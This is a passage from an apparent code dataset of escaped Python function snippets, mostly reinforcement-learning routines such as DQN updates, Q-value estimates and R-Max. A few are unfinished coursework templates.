F.mse_loss(q_values, expected_q_value)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n # Update the target network\n self.soft_update(self.main_network, self.target_network, TAU)", "def back_prop(net, input_values, desired_output, r=1, minimum_accuracy=-0.001):\n raise NotImplementedError", "def mc_glie(env, iterations=1000, gamma=0.9):\n nS = env.nS # number of states\n nA = env.nA # number of actions\n Q_value = np.zeros((nS, nA))\n n_visits = np.zeros((nS, nA))\n policy = np.ones((env.nS,env.nA))/env.nA # initially all actions are equally likely\n epsilon = 1\n ############################\n # YOUR IMPLEMENTATION HERE #\n # HINT: Don't forget to decay epsilon according to GLIE\n\n start = time.time() # to time how long convergence takes\n print(\"---Monte Carlo First Visit---\\nTraining Started.\")\n # policy = epsilon_greedy_policy_improve(Q_value, nS, nA, epsilon)\n k = 1\n while k < iterations:\n # if (k%10000) == 0:\n # print(\"Now playing iteration: \", k)\n \n Q_value, n_visits = 
mc_policy_evaluation(env, policy, Q_value, n_visits, gamma=0.9) # evaluate using Monte Carlo First Visit\n # print(\"Q_value = {0}\".format(Q_value))\n # print(\"n_visits = {0}\".format(n_visits))\n k += 1\n epsilon = 1/k # update epsilon\n policy = epsilon_greedy_policy_improve(Q_value, nS, nA, epsilon) # Improve policy using epsilon-greedy\n\n # print(\"Policy = {0}\".format(policy))\n # print(\"---\")\n \n stop = time.time()\n print(\"Training Completed.\")\n print(\"It took: {0} iterations and {1} minutes\".format(k,(stop-start)/60))\n\n ############################\n det_policy = np.argmax(Q_value, axis=1)\n return Q_value, det_policy", "def _build_algorithm(self):\n self.optimizer = tf.train.AdamOptimizer(self._lr, epsilon=1.5e-8)\n trainable_variables = tf.trainable_variables(\"main/qnet\")\n\n # Compute the state value.\n batch_size = tf.shape(self._observation)[0]\n action_index = tf.stack([tf.range(batch_size), self._action], axis=1)\n action_q = tf.gather_nd(self._qvals, action_index)\n assert_shape(action_q, [None])\n\n # Compute back up.\n ave_q = tf.add_n(self._target_qvals) / self._n_net\n assert_shape(tf.reduce_max(ave_q, axis=1), [None])\n q_backup = tf.stop_gradient(self._reward + self._discount * (1 - self._done) * tf.reduce_max(ave_q, axis=1))\n\n # Compute loss and optimize the object.\n loss = tf.reduce_mean(tf.squared_difference(q_backup, action_q)) # 损失值。\n self._train_op = self.optimizer.minimize(loss, var_list=trainable_variables)\n\n # Update target network.\n update_target_operation = []\n for i in reversed(range(1, self._n_net)): # i=0表示最近的模型。\n with tf.control_dependencies(update_target_operation):\n update_target_operation.append(self._update_target(f\"target_{i}/qnet\", f\"target_{i-1}/qnet\"))\n\n with tf.control_dependencies(update_target_operation):\n update_target_operation.append(self._update_target(\"target_0/qnet\", \"main/qnet\"))\n\n self.update_target_op = update_target_operation\n self._log_op = {\"loss\": loss}", "def verhulst(nb_init, t0, tf, eps, methode, gamma, K) :\n f=lambda y,t : gamma*y*(1-y/K)\n Y=meth_epsilon(nb_init, t0, tf, eps, f, methode)\n return Y", "def predict(self, state):\n if self.phase is None or self.device is None:\n raise AttributeError('Phase, device attributes have to be set!')\n if self.phase == 'train' and self.epsilon is None:\n raise AttributeError('Epsilon attribute has to be set in training phase')\n\n if self.reach_destination(state):\n return ActionXY(0, 0) if self.kinematics == 'holonomic' else ActionRot(0, 0)\n if self.action_space is None:\n self.build_action_space(state.self_state.v_pref)\n\n occupancy_maps = None\n probability = np.random.random()\n if self.phase == 'train' and probability < self.epsilon:\n max_action = self.action_space[np.random.choice(len(self.action_space))]\n else:\n self.action_values = list()\n max_value = float('-inf')\n max_action = None\n for action in self.action_space:\n next_self_state = self.propagate(state.self_state, action)\n if self.query_env:\n next_human_states, reward, done, info = self.env.onestep_lookahead(action)\n else:\n next_human_states = [self.propagate(human_state, ActionXY(human_state.vx, human_state.vy))\n for human_state in state.human_states]\n reward = self.compute_reward(next_self_state, next_human_states)\n batch_next_states = torch.cat([torch.Tensor([next_self_state + next_human_state]).to(self.device)\n for next_human_state in next_human_states], dim=0)\n rotated_batch_input = self.rotate(batch_next_states).unsqueeze(0)\n if self.with_om:\n if 
occupancy_maps is None:\n occupancy_maps = self.build_occupancy_maps(next_human_states).unsqueeze(0)\n rotated_batch_input = torch.cat([rotated_batch_input, occupancy_maps], dim=2)\n # VALUE UPDATE\n next_state_value = self.model(rotated_batch_input).data.item()\n # value = reward + pow(self.gamma, self.time_step * state.self_state.v_pref) * next_state_value\n if self.kinematics == \"holonomic\":\n v = np.linalg.norm(np.array(action))\n value = reward + pow(self.gamma, self.time_step * v) * next_state_value\n else:\n value = reward + pow(self.gamma, self.time_step * action[0]) * next_state_value\n self.action_values.append(value)\n if value > max_value:\n max_value = value\n max_action = action\n \n if max_action is None:\n raise ValueError('Value network is not well trained. ')\n\n if self.phase == 'train':\n self.last_state = self.transform(state)\n # print(\"Action:V:%f,\\tR:%f\\t\"%(max_action.v, max_action.r))\n return max_action", "def _build_target_quantile_values_op(self):\n batch_size = tf.shape(self._replay.rewards)[0]\n ###### Munchausen-specific\n replay_action_one_hot = tf.one_hot(\n self._replay.actions, self.num_actions, 1., 0., name='action_one_hot')\n # tau * ln pi_k+1 (s')\n replay_next_log_policy = utils.stable_scaled_log_softmax(\n self._replay_next_target_q_values, self.tau, axis=1)\n # tau * ln pi_k+1(s)\n replay_log_policy = utils.stable_scaled_log_softmax(\n self._replay_target_q_values, self.tau, axis=1)\n replay_next_policy = utils.stable_softmax( # pi_k+1(s')\n self._replay_next_target_q_values, self.tau, axis=1)\n\n tau_log_pi_a = tf.reduce_sum( # ln pi_k+1(a|s)\n replay_log_policy * replay_action_one_hot, axis=1)\n\n tau_log_pi_a = tf.clip_by_value(\n tau_log_pi_a, clip_value_min=self.clip_value_min, clip_value_max=0)\n\n munchuasen_term = self.alpha * tau_log_pi_a\n #########\n\n # Shape of rewards: (num_tau_prime_samples x batch_size) x 1.\n rewards = self._replay.rewards[:, None] + munchuasen_term[Ellipsis, None]\n rewards = tf.tile(rewards, [self.num_tau_prime_samples, 1])\n\n is_terminal_multiplier = 1. 
- tf.cast(self._replay.terminals, tf.float32)\n # Incorporate terminal state to discount factor.\n # size of gamma_with_terminal: (num_tau_prime_samples x batch_size) x 1.\n gamma_with_terminal = self.cumulative_gamma * is_terminal_multiplier\n gamma_with_terminal = tf.tile(gamma_with_terminal[:, None],\n [self.num_tau_prime_samples, 1])\n\n # shape: (batch_size * num_tau_prime_samples) x num_actions\n replay_next_policy_ = tf.tile(replay_next_policy,\n [self.num_tau_prime_samples, 1])\n replay_next_log_policy_ = tf.tile(replay_next_log_policy,\n [self.num_tau_prime_samples, 1])\n\n # shape: (batch_size * num_tau_prime_samples) x 1\n replay_quantile_values = tf.reshape(\n self._replay_net_target_quantile_values,\n [batch_size * self.num_tau_prime_samples, self.num_actions])\n\n # shape: (batch_size * num_tau_prime_samples) x num_actions\n weighted_logits = (\n replay_next_policy_ * (replay_quantile_values\n - replay_next_log_policy_))\n\n # shape: (batch_size * num_tau_prime_samples) x 1\n target_quantile_values = tf.reduce_sum(weighted_logits, axis=1,\n keepdims=True)\n\n return rewards + gamma_with_terminal * target_quantile_values", "def learn(self, memory: ReplayMemory, batch_size: int) -> float:\n # 从replay buffer当中采样,从经验回放集合中采样batch_size个样本,计算当前目标Q值\n indices, (state_batch, next_batch, action_batch, reward_batch, done_batch), is_weights = \\\n memory.sample(batch_size)\n # 使用行为网络计算值函数 Q_j\n values = self.__policy(state_batch).gather(1, action_batch)\n \n expected = []\n policy_Q_batch = self.__policy(next_batch).cpu().data.numpy()\n max_action_next = np.argmax(policy_Q_batch, axis=1)\n target_Q_batch = self.__target(next_batch)\n \n for i in range(batch_size):\n if done_batch[i]:\n expected.append(reward_batch[i])\n else:\n target_Q_value = target_Q_batch[i, max_action_next[i]]\n expected.append(reward_batch[i] + self.__gamma * target_Q_value)\n \n expected = torch.stack(expected)\n TD_error = torch.abs(expected - values)\n memory.update(indices, TD_error)\n \n # 根据目标函数 (Q_j - expected)^2来梯度下降\n loss = (torch.FloatTensor(is_weights).to(self.__device) * F.mse_loss(values, expected)).mean()\n\n self.__optimizer.zero_grad()\n loss.backward()\n for param in self.__policy.parameters():\n param.grad.data.clamp_(-1, 1)\n self.__optimizer.step()\n\n return loss.item()", "def rmax(env, gamma, m, R_max, epsilon, num_episodes, max_step = 6):\n\n Q = np.ones((env.nS, env.nA)) * R_max / (1 - gamma)\n R = np.zeros((env.nS, env.nA))\n nSA = np.zeros((env.nS, env.nA))\n nSASP = np.zeros((env.nS, env.nA, env.nS))\n ########################################################\n # YOUR CODE HERE #\n ########################################################\n\n # Generate episodes\n average_scores = []\n accum = 0.0\n term = int(np.log(1 / (epsilon * (1 - gamma))) / (1 - gamma))\n for i in xrange(num_episodes):\n S = env.reset()\n done = False\n episode_reward = 0.0\n n_steps = 0\n\n while not done:\n\n if n_steps >= max_step:\n break\n\n A = np.argmax([Q[S,a] for a in range(env.nA)])\n\n # Make an action\n nextS, reward, done, _ = env.step(A)\n episode_reward += reward\n\n # R-Max\n if nSA[S, A] < m:\n nSA[S, A] += 1\n R[S, A] += reward\n nSASP[S, A, nextS] += 1\n\n if nSA[S, A] == m:\n for j in range(term):\n for S_bar in range(env.nS):\n for A_bar in range(env.nA):\n if nSA[S_bar, A_bar] >= m:\n N = float(nSA[S_bar, A_bar])\n T_hat = nSASP[S_bar, A_bar, :] / N\n R_hat = R[S_bar, A_bar] / N\n Q[S_bar, A_bar] = R_hat\n Q[S_bar, A_bar] += gamma * np.sum(T_hat * np.max(Q, axis=1))\n\n\n # Update Q-value\n S = 
nextS\n n_steps += 1\n\n accum += episode_reward\n average_scores.append(accum/(i+1))\n\n plt.plot(average_scores[:10000], label=\"m=%d\"%(m))\n\n ########################################################\n # END YOUR CODE #\n ########################################################\n return Q", "def fit(self, x, y):\n def initiate_theta(dim):\n self.theta = np.zeros(dim)\n # print('self.theta initiated is {}'.format(self.theta))\n \n def implement_sigmoid(x):\n if self.theta is None:\n initiate_theta(x.shape[1])\n z = np.matmul(np.transpose(self.theta), np.transpose(x))\n return 1/(np.ones(x.shape[0]) + np.exp(-z))\n \n def implement_partial_loss(x, y):\n return -np.matmul(np.transpose(y - implement_sigmoid(x)), x)/x.shape[0]\n \n def implement_transposed_hess(x):\n sigmoid_hadamard = implement_sigmoid(x) * (np.ones(x.shape[0]) - implement_sigmoid(x))\n hess2 = np.diag(sigmoid_hadamard)\n hess = np.matmul(hess2,x)\n hess = np.matmul(np.transpose(x),hess)/x.shape[0]\n hess_inverse = np.linalg.inv(hess)\n return hess_inverse\n \n def train(x, y):\n count = 0\n if self.theta is None:\n initiate_theta(x.shape[1])\n while count < self.max_iter:\n if self.verbose:\n loss_y1 = np.matmul(np.transpose(y), np.log(implement_sigmoid(x)))\n loss_y0 = np.matmul(np.transpose(np.ones(x.shape[0]) - y), np.log(np.ones(x.shape[0]) - implement_sigmoid(x)))\n loss = -(loss_y1 + loss_y0 )/x.shape[0]\n print('Average empirical loss for step {} is {}'.format(count, loss))\n delta = np.matmul(implement_transposed_hess(x), implement_partial_loss(x, y))\n new_theta = self.theta - delta * self.step_size\n delta_theta = np.linalg.norm(new_theta - self.theta)\n # print('delta is {}'.format(delta_theta))\n if delta_theta < self.eps:\n return new_theta\n else:\n self.theta = new_theta\n count += 1\n return self.theta\n \n return train(x, y)", "def algorithm(self):\n convergence_threshold = 50\n reward_num_threshold = 300\n alpha = 1\n gamma = 0.5\n while (self.reward_num < reward_num_threshold) and (self.count<convergence_threshold):\n print('------')\n print('Iteration', self.reward_num, '/', reward_num_threshold)\n print('Iterations w/out Q-update:', self.count, '/', convergence_threshold)\n # select a possible action (any of them; all are valid)\n s = self.get_state_num()\n print(\"Initial state:\", s)\n a = random.choice(np.arange(3))\n self.apply_action(a)\n while self.reward == None:\n #print(\"Sleeping to wait for reward\")\n rospy.sleep(0.5)\n reward = self.reward\n print(\"REWARD =\", reward)\n self.reward = None\n if reward == 0:\n next_state = self.get_state_num()\n mx = np.amax(self.Q[next_state])\n else:\n ## There is no next state if nonzero reward seen\n mx = 0\n update = self.Q[s][a] + alpha*(reward+gamma*mx-self.Q[s][a])\n if self.Q[s][a] != update:\n print(\"Update Q matrix\")\n self.Q[s][a] = update\n self.count = 0\n else:\n self.count += 1\n\n print(\"Finished calculating Q-Matrix\\n\\n\\n\\n\\n\\n\\n\")", "def predict(self, u):\n\n dtheta_l = self.current_state_estimate[0,0]\n dtheta_r = self.current_state_estimate[1,0]\n v = self.current_state_estimate[2,0]\n w = self.current_state_estimate[3,0]\n x = self.current_state_estimate[4,0]\n y = self.current_state_estimate[5,0]\n theta = self.current_state_estimate[6,0]\n vl = u[0,0]\n vr = u[1,0]\n \n # Vary noise with input voltage\n if abs(self.current_state_estimate[0,0]) < .03:\n self.Q[0,0] = .0000001\n dtheta_l = 0\n\n else:\n self.Q[0,0] = abs(vl)*.03/3000+.03\n\n if abs(self.current_state_estimate[1,0]) < .03:\n self.Q[1,1] = .0000001\n dtheta_r 
= 0\n else:\n self.Q[1,1] = abs(vr)*.03/3000+.03\n\n ## TRANSITION ESTIMATE\n self.current_state_estimate[0] += self.dt*(self.k2_l*dtheta_l + self.k1_l*vl)\n self.current_state_estimate[1] += self.dt*(self.k2_r*dtheta_r + self.k1_r*vr)\n self.current_state_estimate[2] = self.r/2 * (self.current_state_estimate[0] + self.current_state_estimate[1])\n self.current_state_estimate[3] = self.r/self.l * (self.current_state_estimate[1] - self.current_state_estimate[0])\n self.current_state_estimate[4] += (self.dt)*self.current_state_estimate[2]*math.cos(theta)\n self.current_state_estimate[5] += (self.dt)*self.current_state_estimate[2]*math.sin(theta)\n self.current_state_estimate[6] += (self.dt)*self.current_state_estimate[3]\n \n ## TRANISTION PROBABILITY\n # only propogate the things that can move\n self.A[0:7, 0:7] = np.array([[1+self.dt*self.k2_l, 0, 0, 0, 0, 0, 0],\\\n [0, 1+self.dt*self.k2_r, 0, 0, 0, 0, 0],\\\n [self.r/2, self.r/2, 0, 0, 0, 0, 0],\\\n [-self.r/self.l, self.r/self.l, 0, 0, 0, 0, 0],\\\n [0, 0, math.cos(theta)*self.dt , 0, 1, 0, -v*math.sin(theta)*self.dt],\\\n [0, 0, math.sin(theta)*self.dt , 0, 0, 1, v*math.cos(theta)*self.dt],\\\n [0, 0, 0, self.dt, 0, 0, 1]])\n \n self.current_prob_estimate = np.dot(np.dot(self.A, self.current_prob_estimate), np.transpose(self.A)) + self.Q", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n Q_Value = 0 #initializing q value\n\n feat_Extractor = self.featExtractor\n\n weight = self.weights #To get the weight to control exploration and exploitation\n\n features = feat_Extractor.getFeatures(state,action) #to get all the features associated with (state,action) pair\n\n for each_feature in features:\n #refer to README_Reinforcement.txt for the formula at line 11\n temp_Qvalue = weight[each_feature] * features[each_feature] #Q(state,action) = w * featureVector where * is the dotProduct operator\n Q_Value = Q_Value + temp_Qvalue\n\n return Q_Value #Returns final qvalue\n #util.raiseNotDefined()", "def learn(self, experiences, gamma):\n states_and_prev_recurrents, actions, recurrents, rewards, next_states, dones = experiences\n\n # Get max predicted Q values (for next states) from target model\n next_states_and_recurrents = torch.cat([next_states, recurrents], dim=1)\n Q_targets_next = self.qnetwork_target(next_states_and_recurrents).detach().max(1)[0].unsqueeze(1)\n # Compute Q targets for current states\n Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))\n\n # Get expected Q values from local model\n Q_expected = self.qnetwork_local(states_and_prev_recurrents).gather(1, actions)\n\n # Compute loss\n loss_rl = F.mse_loss(Q_expected, Q_targets)\n\n states = states_and_prev_recurrents[:, :8]\n target_recurrents = map_observation_to_recurrent_state(states)\n recurrent_pred = self.qnetwork_local(states_and_prev_recurrents)[:, -5:]\n\n loss_internal_states = F.multilabel_soft_margin_loss(recurrent_pred, target_recurrents)\n\n loss = loss_rl + loss_internal_states\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n # ------------------- update target network ------------------- #\n self.soft_update(self.qnetwork_local, self.qnetwork_target, TAU)", "def learn(self, experiences, gamma):\n states, actions, rewards, next_states, dones, indices = experiences\n\n # Get max predicted Q values (for next states) from target model\n if self.dbl_dqn:\n local_best_actions = self.qnetwork_local(next_states).detach().argmax(1)\n Q_next_states = self.qnetwork_target(next_states)\n Q_targets_next = 
Q_next_states.gather(1, local_best_actions.unsqueeze(1))\n else:\n Q_targets_next = self.qnetwork_target(next_states).detach().max(1)[0].unsqueeze(1)\n\n # Compute Q targets for current states\n Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))\n\n # Get expected Q values from local model\n Q_expected = self.qnetwork_local(states).gather(1, actions)\n\n # Compute loss\n if self.priority_rpl:\n errors = abs(Q_expected - Q_targets)\n self.memory.update_priorities(indices, errors)\n importance = self.memory.get_importance(indices, self.a, self.b)\n importance = np.array(importance)\n loss = torch.mean(torch.mul(errors.float(), torch.from_numpy(importance).float().to(device)))\n else:\n loss = F.mse_loss(Q_expected, Q_targets)\n\n # Minimize the loss\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()", "def __call__(self): \n m = np.zeros((len(self.observation),))\n k = np.zeros((len(self.observation), len(self.prior)))\n \n sv = self.stateVector\n m = sv[0] * np.exp(-(self.independentVariable/sv[1])) + sv[2]\n \n k[:, 0] = np.exp(-(self.independentVariable/sv[1]))\n k[:, 1] = (sv[0] * self.independentVariable * \n np.exp(-(self.independentVariable/sv[1]))/(sv[1])**2)\n k[:, 2] = np.ones((len(self.observation),))\n \n self.modelCalculation, self.Jacobian = m, k\n \n return m, k", "def get_action_value(mdp, state_values, state, action, gamma):\n\n Q = 0\n # YOUR CODE HERE\n return Q", "def compute_output_delta(self, target):\r\n self.compute_activation\r\n out=self.activation\r\n self.delta=out*(1-out)*(target-out)", "def learn(self):\n batch = self.agent.replay_buffer.sample(self.batch_size)\n states = torch.tensor([x.state for x in batch], dtype=torch.float32).to(self.agent.device) # shape == (batch_size, 3, 6, 7)\n actions = [x.action for x in batch]\n rewards = torch.tensor([x.reward for x in batch], dtype=torch.float32).to(self.agent.device)\n next_states = torch.tensor([x.next_state for x in batch], dtype=torch.float32).to(self.agent.device)\n dones = [x.done for x in batch]\n\n self.optimizer.zero_grad()\n\n\n q_vals = self.agent.policy_net(states)[range(len(actions)), actions] # Q vals for actions taken\n q_next_vals = self.agent.target_net(next_states).detach() # we don't care about grad wrt target net\n q_next_vals[dones] = 0.0 # terminal states have no future expected value\n q_targets = rewards + self.gamma * torch.max(q_next_vals, dim=1)[0]\n\n # all_q_vals = self.agent.policy_net(states)\n # print()\n # print('actions')\n # print(actions)\n # print()\n # print('original all q vals')\n # print(self.agent.policy_net(states)) \n # print(self.agent.policy_net(states).shape)\n # print()\n # print('QVALS:', q_vals)\n # print(q_vals.shape)\n # print('\\n\\n')\n # print('QTARGETS:', q_targets)\n # print(q_targets.shape)\n\n # breakpoint()\n\n loss = self.loss_fn(q_targets, q_vals).to(self.agent.device)\n loss.backward()\n \n # for layer in self.agent.policy_net.named_parameters():\n \n # # print(f'layer: {layer[0]}')\n # # print(f'grad:', layer[1].grad)\n\n # # print('loss', loss)\n # # print('q_vals grad:', q_vals.grad)\n # # print('states:', )\n\n self.optimizer.step()\n\n self.agent.learning_iters += 1\n if self.agent.learning_iters % self.target_update_freq == 0:\n self.agent.update_target_net()\n # logger.info('Updated target net')", "def model(X_train, Y_train, X_test, Y_test, num_iterations, learning_rate, print_cost):\n\n\n # initialize parameters with zeros\n w, b = initialize_with_zeros(X_train.shape[0]);\n\n print(\"w.shape() = \" +str(w.shape)+ 
\", b = \" +str(b));\n\n # Gradient descent\n parameters, grads, costs = optimize(w, b, X_train, Y_train, num_iterations, learning_rate, print_cost);\n \n # Retrieve parameters w and b from dictionary \"parameters\"\n w = parameters[\"w\"]\n b = parameters[\"b\"]\n \n # Predict test/train set examples \n Y_prediction_test = predict(w, b, X_test)\n Y_prediction_train = predict(w, b, X_train)\n\n # Print train/test Errors\n print(\"train accuracy: {} %\".format(100 - np.mean(np.abs(Y_prediction_train - Y_train)) * 100))\n print(\"test accuracy: {} %\".format(100 - np.mean(np.abs(Y_prediction_test - Y_test)) * 100))\n \n d = {\"costs\": costs,\n \"Y_prediction_test\": Y_prediction_test, \n \"Y_prediction_train\" : Y_prediction_train, \n \"w\" : w,\n \"b\" : b,\n \"learning_rate\" : learning_rate,\n \"num_iterations\": num_iterations}\n \n return d", "def calculateTarget(self, qValuesNewState, reward, isFinal):\n if isFinal:\n return reward\n else :\n return reward + self.discountFactor * self.getMaxQ(qValuesNewState)", "def learn(self, experiences, gamma):\n states, actions, rewards, next_states, dones = experiences\n # print('learn states.shape', states.shape)\n # print('learn next_states.shape', next_states.shape)\n \n q_expected, q_targets = self.get_target_and_expected(states, \n actions, \n rewards, \n next_states, \n dones, \n gamma)\n\n\n # Compute loss\n loss = F.mse_loss(q_expected, q_targets)\n # Minimize the loss\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n # ------------------- update target network ------------------- #\n self.soft_update(self.qnetwork_local, self.qnetwork_target, TAU)", "def get_optimal_beta(self):\n if self.annealing:\n # find the epoch/index that had the highest NDCG@k value\n index_max_ndcg = np.argmax(self.val_ndcg)\n\n # using this index find the value that beta had at this epoch\n return self.ls_beta[index_max_ndcg]\n else:\n return self.beta", "def evaluate(self, X, y):\n\n inputs = np.concatenate((X,-np.ones((np.shape(X)[0],1))),axis=1)\n outputs = self.forwardPass(inputs)\n nclasses = np.shape(y)[1]\n\n # 1-of-N encoding\n outputs = np.argmax(outputs,1)\n targets = np.argmax(y,1)\n\n cm = np.zeros((nclasses,nclasses))\n for i in range(nclasses):\n for j in range(nclasses):\n cm[i,j] = np.sum(np.where(outputs==i,1,0)*np.where(targets==j,1,0))\n\n print(\"The confusion matrix is:\")\n print(cm)\n self.accuracy = np.trace(cm)/np.sum(cm)*100\n print(\"The accuracy is \",np.trace(cm)/np.sum(cm)*100)", "def epoch(self):\n old_vals = (self._controller.kp, self._controller.ki, self._controller.kd)\n gamma = 0.01\n grad = self._get_gradient()\n\n new_vals = [p - gamma*g for p, g in zip(old_vals, grad)]\n\n self._controller.kp = new_vals[0] if new_vals[0] > 0 else 0\n self._controller.ki = new_vals[1] if new_vals[1] > 0 else 0\n self._controller.kd = new_vals[2] if new_vals[2] > 0 else 0", "def optimize(self):\n \n # converting from batch to local quantities\n if self.dispersion == \"gene-batch\":\n local_dispersion = tf.matmul(self.batch, tf.exp(self.px_r))\n else: \n local_dispersion = tf.exp(self.px_r)\n \n if self.library_mode == \"numeric\":\n local_l_mean = self.library_size_mean\n local_l_var = self.library_size_var\n else:\n local_l_mean = tf.matmul(self.batch, self.library_size_mean)\n local_l_var = tf.matmul(self.batch, self.library_size_var)\n \n \n # VAE loss\n if self.zi:\n recon = log_zinb_positive(self.expression, self.px_rate, local_dispersion, \\\n self.px_dropout)\n else:\n recon = log_nb_positive(self.expression, 
self.px_rate, local_dispersion)\n \n kl_gauss_z = 0.5 * tf.reduce_sum(\\\n tf.square(self.qz_m) + self.qz_v - tf.log(1e-8 + self.qz_v) - 1, 1)\n\n if self.scalings:\n kl_gauss_l = 0.5 * tf.reduce_sum(\\\n tf.square(self.ql_m - local_l_mean) / local_l_var \\\n + self.ql_v / local_l_var \\\n + tf.log(1e-8 + local_l_var) - tf.log(1e-8 + self.ql_v) - 1, 1)\n \n if self.scalings:\n self.ELBO_gau = tf.reduce_mean(recon - self.kl_scale * kl_gauss_z - kl_gauss_l)\n else:\n self.ELBO_gau = tf.reduce_mean(recon - self.kl_scale * kl_gauss_z)\n \n # MMD loss\n if self.apply_mmd:\n self.mmd = mmd_objective(self.z, self.batch_ind, self.num_batches)\n self.loss = - self.ELBO_gau + self.mmd_scale * self.mmd\n \n else:\n self.loss = - self.ELBO_gau\n \n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n optimizer = self.optimize_algo\n with tf.control_dependencies(update_ops):\n self.train_step = optimizer.minimize(self.loss)", "def DRate_j(eta,Pap,Pec,exp_loss_jt):\n return (1 + Pap)*(1 - (1 - 2*Pec)*exp_loss_jt)", "def learn(self, experiences, gamma):\n \n states, actions, rewards, next_states, dones = experiences\n\n # Get max predicted Q values (for next states) from target model\n Q_targets_next = self.qnetwork_target(next_states).detach().max(1)[0].unsqueeze(1)\n # Compute Q targets for current states \n Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))\n\n # Get expected Q values from local model\n Q_expected = self.qnetwork_local(states).gather(1, actions)\n\n # Compute loss\n loss = F.mse_loss(Q_expected, Q_targets)\n # Minimize the loss\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n # ------------------- update target network ------------------- #\n self.soft_update(self.qnetwork_local, self.qnetwork_target, TAU)", "def ground_state(self) -> numpy.ndarray:\n # Optimal cost\n cost_min = min(self.cost)\n # Find the args that corresponds to the optimal cost\n args = numpy.where(self.cost == cost_min)\n # Create the ideal state\n rho = numpy.zeros(2**self.num_nodes)\n for arg in args[0]:\n rho[arg] = 1\n return rho / numpy.sum(rho)", "def act(self, observation):\n if np.random.random() < self.epsilon:\n return np.random.randint(0,9)\n else:\n return np.argmax(self.values)", "def act(self, observation):\n if np.random.random() < self.epsilon:\n return np.random.randint(0,9)\n else:\n return np.argmax(self.values)", "def calc_q_values(self, state):\n state = state[None, :, :, :]\n return self.q_network.predict_on_batch(state)", "def compute_td_loss(states, actions, rewards, next_states, is_done,\n agent, target_network,\n gamma=0.99,\n check_shapes=False,\n device=device):\n states = torch.tensor(states, device=device, dtype=torch.float32) # shape: [batch_size, *state_shape]\n actions = torch.tensor(actions, device=device, dtype=torch.int64) # shape: [batch_size]\n rewards = torch.tensor(rewards, device=device, dtype=torch.float32) # shape: [batch_size]\n # shape: [batch_size, *state_shape]\n next_states = torch.tensor(next_states, device=device, dtype=torch.float)\n is_done = torch.tensor(\n is_done.astype('float32'),\n device=device,\n dtype=torch.float32,\n ) # shape: [batch_size]\n is_not_done = 1 - is_done\n\n # get q-values for all actions in current states\n predicted_qvalues = agent(states) # shape: [batch_size, n_actions]\n\n # compute q-values for all actions in next states\n predicted_next_qvalues = target_network(next_states) # shape: [batch_size, n_actions]\n \n # select q-values for chosen actions\n predicted_qvalues_for_actions = 
predicted_qvalues[range(len(actions)), actions] # shape: [batch_size]\n\n # compute V*(next_states) using predicted next q-values\n next_state_values = <YOUR CODE>\n\n assert next_state_values.dim() == 1 and next_state_values.shape[0] == states.shape[0], \"must predict one value per state\"\n\n # compute \"target q-values\" for loss - it's what's inside square parentheses in the above formula.\n # at the last state use the simplified formula: Q(s,a) = r(s,a) since s' doesn't exist\n # you can multiply next state values by is_not_done to achieve this.\n target_qvalues_for_actions = <YOUR CODE>\n\n # mean squared error loss to minimize\n loss = torch.mean((predicted_qvalues_for_actions - target_qvalues_for_actions.detach()) ** 2)\n\n if check_shapes:\n assert predicted_next_qvalues.data.dim() == 2, \"make sure you predicted q-values for all actions in next state\"\n assert next_state_values.data.dim() == 1, \"make sure you computed V(s') as maximum over just the actions axis and not all axes\"\n assert target_qvalues_for_actions.data.dim() == 1, \"there's something wrong with target q-values, they must be a vector\"\n\n return loss", "def best_params(self):\n return self.X[np.argmax(self.y.numpy())]", "def learn(self, experiences, gamma):\n states, actions, rewards, next_states, dones, idxs, weights = experiences\n \n\n # Get max predicted Q values (for next states) from target model\n Q_targets_next = self.qnetwork_target(next_states).detach().max(1)[0].unsqueeze(1)\n # Compute Q targets for current states \n Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))\n\n # Get expected Q values from local model\n Q_expected = self.qnetwork_local(states).gather(1, actions)\n\n # Compute loss MSE\n loss = (Q_expected - Q_targets.detach()).pow(2)\n # Add weights to loss\n loss = loss * weights\n # Add noise to loss to arrive at prior weights\n prios = loss + 1e-6\n # Take mean\n loss = loss.mean()\n\n # Minimize the loss\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n # Update buffer priorities\n self.memory.update_priorities(zip(idxs, prios.data.cpu().numpy()))\n\n\n\n # ------------------- update target network ------------------- #\n self.soft_update(self.qnetwork_local, self.qnetwork_target, TAU)", "def prediction_cost(a, y):\n return np.sum(-(y * np.log(a) + (1 - y) * np.log(1 - a)))", "def get_value(self, state):\n epsilon = self.epsilon\n possible_actions = self.get_legal_actions(state)\n\n #If there are no legal actions, return 0.0\n if len(possible_actions) == 0:\n return 0.0\n\n optimal_action = possible_actions[\n np.argmax([self.get_qvalue(state, action) for action in possible_actions])\n ]\n state_value = 0\n for action in possible_actions:\n if action == optimal_action:\n state_value += (1 - epsilon) * self.get_qvalue(state, action)\n state_value += (epsilon / len(possible_actions)) * self.get_qvalue(state, action)\n return state_value", "def update_parameter(self):\n\n if self.testing: # 1. No random choice when testing\n self.epsilon = 0\n else: # 2. 
